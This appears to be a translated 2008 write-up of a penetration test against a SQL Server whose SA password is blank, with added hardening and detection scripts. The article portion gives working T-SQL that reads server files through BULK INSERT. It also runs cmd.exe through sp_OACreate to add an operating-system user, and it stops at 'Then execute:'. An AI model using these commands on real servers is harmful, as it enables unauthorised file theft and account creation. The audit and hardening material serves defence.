SQL Server SA blank password penetration test
  Added: 07/11/2008   Published: 07/11/2008
A few days ago a friend asked me to help test their server. After a scan I found that the SQL Server SA password was blank, and decided to use this weakness for the penetration test. During testing I found that the extended stored procedure xp_cmdshell and the registry-reading extended stored procedures had been deleted, and xplog70.dll was deleted as well, so it was impossible to run CMD commands or clone the administrator account; the server had clearly been hardened. With what I knew at the time there was no way to get in. I had met similar machines before, so I decided to spend several days on solving this problem.

After two days of reading material and testing, I found that, without using any of SQL Server's built-in extended stored procedures, it is possible to obtain the contents of files such as .txt and .asp from the target machine (provided the SA password is known or blank). The method is to create a temporary table, read the file into it, and then use a SELECT statement to get the return value, namely the file content. We can first create a stored procedure in Query Analyzer and execute it; afterwards we only need to call this stored procedure whenever it is needed:

Create proc sp_readTextFile @filename sysname
as
begin
    set nocount on
    -- temporary table that holds one line of the file per row
    Create table #tempfile (line varchar(8000))
    -- BULK INSERT takes the path as a single-quoted literal, so the quotes are doubled inside the string
    exec ('bulk insert #tempfile from ''' + @filename + '''')
    select * from #tempfile
    drop table #tempfile
End
go


With this in place, executing a statement like the following returns the content of the file at the given path:

exec sp_readTextFile 'c:\aaa.asp'
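The technique above works only because the SA login has a blank password and SA can run BULK INSERT. An added audit and remediation script, not part of the original article, that finds exactly those two conditions on a server; it assumes SQL Server 2005 or later (sys.sql_logins, PWDCOMPARE and the sys.server_* catalog views do not exist on the SQL Server 2000 generation the article describes), and the sa password and renamed login are placeholders:

```sql
-- Added defensive audit, not part of the original article.
-- Assumes SQL Server 2005 or later; placeholder values are marked as such.

-- 1. SQL logins whose password is blank: the weakness the article relies on.
--    PWDCOMPARE returns 1 when the supplied clear-text password matches the stored hash.
SELECT name, is_disabled
FROM sys.sql_logins
WHERE PWDCOMPARE(N'', password_hash) = 1;

-- 2. Who can run BULK INSERT: members of sysadmin (which implies it) and bulkadmin ...
SELECT r.name AS role_name, m.name AS member_name, m.type_desc
FROM sys.server_role_members rm
JOIN sys.server_principals r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals m ON m.principal_id = rm.member_principal_id
WHERE r.name IN ('sysadmin', 'bulkadmin');

--    ... plus anyone granted ADMINISTER BULK OPERATIONS directly.
SELECT p.name AS grantee, perm.permission_name, perm.state_desc
FROM sys.server_permissions perm
JOIN sys.server_principals p ON p.principal_id = perm.grantee_principal_id
WHERE perm.permission_name = 'ADMINISTER BULK OPERATIONS';

-- 3. Remediation: give sa a strong password, disable it, and rename it so the
--    well-known principal name cannot be used at all (placeholder values).
ALTER LOGIN sa WITH PASSWORD = N'<strong-placeholder-password>';
ALTER LOGIN sa DISABLE;
ALTER LOGIN sa WITH NAME = [sa_disabled_placeholder];
```

When a SQL-authenticated login runs BULK INSERT, the file is opened under the SQL Server service account, so the reach of the procedure above is bounded by that account's file permissions; running the service as a low-privilege account, rather than LocalSystem, limits what a compromised SA can read even if the login audit is missed.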
After getting this working, my plan was to read the website's ASP code on the friend's server and use it for further intrusion, but I then found that, since I did not know the absolute path of the website's ASP files, this function was basically useless, so I had to give up on it and look for other methods. Several days later I remembered the OLE-related series of stored procedures that security articles mention frequently. This series is just as dangerous as xp_cmdshell and the registry-reading extended stored procedures, but its usage is not covered on the net and in books nearly as thoroughly as those are. The series consists of sp_OACreate, sp_OADestroy, sp_OAGetErrorInfo, sp_OAGetProperty, sp_OAMethod, sp_OASetProperty and sp_OAStop. Below I describe the usage I obtained from the material I consulted:

Open Query Analyzer, connect to the target machine as SA, and execute in Query Analyzer:

DECLARE @shell INT
EXEC SP_OACREATE 'wscript.shell', @shell OUTPUT
EXEC SP_OAMETHOD @shell, 'run', null, 'c:\WINNT\system32\cmd.exe /c net user ceshi 1 /add'--


This adds a user named ceshi with the password 1 on the other side's system. Then execute:
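The sp_OA* procedures give any sysadmin login a path to the operating system that survives the deletion of xp_cmdshell and xplog70.dll described earlier. An added hardening and detection script, not part of the original article: it reports and disables the two surfaces through the supported sp_configure options instead of deleting DLLs, and records any batch or RPC call that still references them. It assumes SQL Server 2008 or later (the 'Ole Automation Procedures' and 'xp_cmdshell' options exist from 2005, Extended Events from 2008); the session name and the .xel output path are placeholders.

```sql
-- Added hardening and detection script, not part of the original article.
-- Assumes SQL Server 2008 or later; session name and output path are placeholders.

-- 1. Current state of the two dangerous surfaces (value_in_use = 1 means enabled).
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('Ole Automation Procedures', 'xp_cmdshell', 'show advanced options');

-- 2. Turn both off. They are off on a fresh install; this enforces it on a live server.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 0;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
GO

-- 3. Record who still sends sp_OA* or xp_cmdshell, from which host and application.
IF EXISTS (SELECT 1 FROM sys.server_event_sessions WHERE name = 'watch_ole_automation')
    DROP EVENT SESSION watch_ole_automation ON SERVER;
GO
CREATE EVENT SESSION watch_ole_automation ON SERVER
ADD EVENT sqlserver.sql_batch_completed (
    ACTION (sqlserver.client_app_name, sqlserver.client_hostname, sqlserver.server_principal_name)
    WHERE (sqlserver.like_i_sql_unicode_string(batch_text, N'%sp_OA%')
        OR sqlserver.like_i_sql_unicode_string(batch_text, N'%xp_cmdshell%'))
),
ADD EVENT sqlserver.rpc_completed (
    ACTION (sqlserver.client_app_name, sqlserver.client_hostname, sqlserver.server_principal_name)
    WHERE (sqlserver.like_i_sql_unicode_string(statement, N'%sp_OA%')
        OR sqlserver.like_i_sql_unicode_string(statement, N'%xp_cmdshell%'))
)
ADD TARGET package0.event_file (SET filename = N'<placeholder-path>\watch_ole_automation.xel')
WITH (STARTUP_STATE = ON);
GO
ALTER EVENT SESSION watch_ole_automation ON SERVER STATE = START;
```

The text filter catches the direct calls shown in the article, but not an sp_OACreate call hidden inside a user-defined stored procedure, whose body is not in the batch text; for that, the configuration check in step 1 is the reliable control, since with the option off the procedures fail regardless of how they are invoked. Step 2 requires sysadmin, which is the same privilege level the attacker already holds on a blank-SA server, so the password and login fixes have to come first.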
